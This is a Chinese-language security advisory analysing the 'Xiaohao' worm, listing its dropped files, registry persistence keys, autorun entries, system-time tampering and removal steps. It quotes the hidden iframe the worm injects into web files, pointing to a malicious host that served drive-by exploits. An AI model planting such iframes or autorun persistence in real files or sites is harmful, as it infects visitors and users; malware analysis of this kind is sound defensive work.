小浩蠕虫分析与解决方案

一、病毒描述：
　　         今日，DSW Lab Avert小组监测到一个具备较强破坏力的名为小浩的蠕虫病毒开始传播，该病毒类似此前曾肆虐.网络的熊猫烧香病毒，破坏性感染系统文件，并在受害者系统上遍历网页/脚本文件，插入带毒的网址。因为病.毒的破坏性感染行为，导致被感染文件无法修复，严重被感染系统无法使用，会导致用户无法开机现象。

　　          感染效果截图：

　　二、病毒基本情况：
　　         病毒.名称：Worm.Win32.Xiaohao.a
　　         病毒别名：小浩
　　         病毒类型：蠕虫
　　         危害级别：4
　　         感染平台：Windows 平台
　           编写语言：C/C++

　　三、病毒行为：
　　          1、当病毒体在被感染的系统上激活后，会在磁盘跟目录释放autorun.inf等文件，感染U盘等移动设备：
　　             %DRIVE%\autorun.inf 文件属性：H
　　             %DRIVE%\Xiaohao.exe 文件属性：H

　　          2、同时在跟目录释放一个名为Jilu.txt文件，记录了相关感染文件列表。
　          　3、拷贝自身到系统.目录下，全路径： %SystemRoot%\system32\exloroe.exe
　          　4、将自动加入到注册表启动项确保自身启动激活：

　　 　          键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components
　　　             键名：{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}
　　　             键值：%SystemRoot%\system32\exloroe.exe

　          　5、将系统时间修改为2005年1月17日，会导致部分杀毒软件和其他正版软件因授权问题无法激活。
      
　            6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件，向其中插入病毒网址。
         　       <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
         　       其中该恶意页面利用多个系统漏洞针.对Windows 2000/XP/2003进行有针对性的挂马。

        　       恶意页面的代码截图：

           　7、其它行为：
         　       修改注册表使系统无法正常浏览.隐藏文件，修改注册表劫持正常的EXE运行，使得运行一些文件会先运行蠕虫自身：
         　       HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
        　        shell\Auto\command=Xiaohao.exe
         　       shellexecute=Xiaohao.exe
         　       open=Xiaohao.exe
　　           　当用户打开感染的文件夹时，资源管理器标题会被修改成：已中毒 X14o-H4o's Virus

　　四、解决方案
　　         1、超级巡警已经紧急升级，请广大用户升级到最.新特征库来预防病毒。
　　         2、对于网页被感染的用户，可以使用超级巡警的垃圾清理功能来批量修复被感染的网页，具体功能垃圾清理→智能扫描→清除指定代码，勾选后填入病毒植入的恶意网页，点击扫描→清除即可。
　　         3、不要运行来历不明的文件。